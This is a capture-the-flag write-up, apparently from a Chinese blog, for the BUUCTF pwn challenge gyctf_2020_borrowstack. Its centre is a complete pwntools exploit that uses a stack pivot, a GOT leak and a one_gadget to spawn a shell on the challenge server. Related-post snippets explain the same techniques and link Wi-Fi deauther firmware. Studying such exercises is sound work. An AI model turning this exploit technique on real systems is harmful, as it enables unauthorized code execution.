[BUUCTF-pwn]——gyctf_2020_borrowstack

最新推荐文章于 2022-09-22 14:20:38 发布
最新推荐文章于 2022-09-22 14:20:38 发布
阅读量328 收藏
点赞数
原文链接:https://www.yuque.com/u239977/cbzkn3/khwvgn
版权

[BUUCTF-pwn]——gyctf_2020_borrowstack

exploit

from pwn import *
from LibcSearcher import *
p = remote('node3.buuoj.cn',28602)
#p = process('./gyctf_2020_borrowstack')
elf = ELF('./gyctf_2020_borrowstack')
#libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
#gdb.attach(p, 'b *0x0000000000400676')
context.log_level = 'debug'
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = elf.symbols['main']
bank = 0x0000000000601080
leave_ret = 0x0000000000400699
pop_rdi = 0x0000000000400703
payload =  'a' * 0x60 + p64(bank) + p64(leave_ret)
p.recvline()
p.send(payload)
payload1 = p64(0x00000000004004c9)*20 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)

p.sendafter('now!\n',payload1)

puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))

log.success("puts_addr -----> :" + hex(puts_addr))

libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
info("libc_base -----> " + hex(libc_base))
sys_addr = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")
one_gadget=libc_base+0x4526a
payload =  'a' * 0x60 + p64(bank) + p64(one_gadget)
p.sendafter('Tell me what you want\n',payload)
#payload1 = p64(0x00000000004004c9)*20 + p64(pop_rdi) + p64(binsh) + p64(sys_addr) + p64(main)

p.sendafter('now!\n','a')
p.interactive()

啊啊啊啊啊啊啊, 为什么要加20个ret呀孩子不清楚孩子想知道。
这河里嘛,这不合理!!!

Y-peak
关注
BUUCTF gyctf_2020_borrowstack
BengDouLove的博客
04-22 844
第一个read的只能溢出0x10字节,也就是刚好覆盖返回地址,如果要ROP地方肯定不够 所以栈迁移到bank,在那里ROP 之前没遇到过这样的题,怎么迁过去我苦思冥想,最终还是看了wp,,用两个leave来控制rsp和rbp寄存器,太妙了 leave是个伪代码,,分解开就是 mov rsp,rbp pop rbp 如果把栈构造成这样 ‘A’ * 0x60 bank_addr leave_...
pwngyctf_2020_borrowstack
Nothing
03-02 1664
例行检查 程序逻辑 看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。 from pwn import * io=remote('node3.buuoj.cn','29302') bank=0x0601080 leave=0x400699 puts_plt=0x0400...
[BUUCTF]PWN——gyctf_2020_borrowstack
mcmuyanga的博客
11-17 1569
gyctf_2020_borrowstack 附件 步骤: 例行检查,64位程序,开启NX保护 本地运行一下程序,看看大概的情况 64位ida载入,直接从main函数开始看程序, buf可以溢出0x10字节,只能够覆盖到ret,参数bank在bss段上,所以打算在buf处利用leave指令去劫持栈,让它跳转去bank处,往bank里写入我们的ret2libc的攻击链去获取shell 随便找个leave指令的地址,leave=0x400699 bank在bss段上的地址 设置rdi寄存器的指令地
关于“gyctf_2020_borrowstack”,涉及栈迁移(pivoting),通用gadge,one_gadget
Probeginner的博客
12-05 313
我们首先给出wp: from pwn import* context.log_level='debug' p=remote('node4.buuoj.cn',26985) elf=ELF('./barop') p_rdi=0x400993 puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] read_got=elf.got['read'] lbic=ELF('./libc-2.23.so') p.recvuntil("u!") ```python p.sen
gyctf_2020_borrowstack
weixin_43439169的博客
09-22 126
gyctf_2020_borrowstack
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN gyctf_2020_bfnote(劫持TLS结构,ret2_dl_runtime_resolve)
weixin_44145820的博客
04-19 1664
目录程序分析背景知识延迟绑定Canary漏洞利用Exp 程序分析 一道带有canary的栈溢出题目 main函数是吧ebp-4中存放地址再减四获得的 调试结果如下 背景知识 延迟绑定 本题需要利用ret2al_runtime_resolve,涉及到延迟绑定的技术,简单介绍一下函数绑定的过程,以atol的调用为例 我们看一下第一次调用程序atol,此时atol_got存放着atol@plt+6...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1017
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
GYCTF2020borrowstack------<栈迁移原理、ret2csu万能gadget、one-gadget工具>
qq_21746331的博客
01-22 1697
GYCTF2020borrowstack知识点关键字样本知识点详解0x1 ret2csu原理0x2 栈迁移原理0x3 one-gadget 工具样本分析0x1 静态分析0x2 payload 构造0x3 动态调试0x4 exp参考文献 知识点关键字 栈迁移、ROP、csu万能gadget、one-gadget 样本 样本来自于GYTF2020_borrowstackBUUCTF上有练习环境 知识点详解 0x1 ret2csu原理 动机: 在 64 位程序中,函数的前 6 个参数是通过寄存器传递
GYCTF 2020-borrowstack
Eagle_hwei的博客
03-12 1093
borrowstack的题目分析 2020-03-1210:46:10 by hawkJW 题目附件、ida文件及wp链接   这道题的漏洞很明显,思路也比较明显,但就是有坑!!!学习一下 1. 程序流程总览 首先,按照惯例,我们看一下程序开启的保护措施,如图所示 除了栈上不可以执行以外,其余的保护措施基本没有开启,因此该程序的保护措施还是比较松的。 下面我们来粗略的浏览一下...
栈帧劫持的一些利用方法及注意事项--buuctf--gyctf_2020_borrowstack
PLpa的博客
07-01 600
前言 最近在刷buuctf时发现了很多栈帧劫持的题目,从中取出最有代表性的、坑最多的拿出来写一篇博客记录一下。 保护机制 64位Linux程序,只开了NX保护。 解题思路 IDA看伪代码 伪代码分析 从代码中我们可以看到,read读入buf的字节大小只多了0x10,这样是不能构成ROP链的,但是我们发现,程序下面给了我们一个bank的bss段的地址,这不就是典型的劫持栈帧到bss段吗? 但是这里有一个坑: 我们可以看到got.plt距离bss段非常近,而bank又正好是在0x601080的位置,当我们
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 452
buuctf-pwn 001-016题wp
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值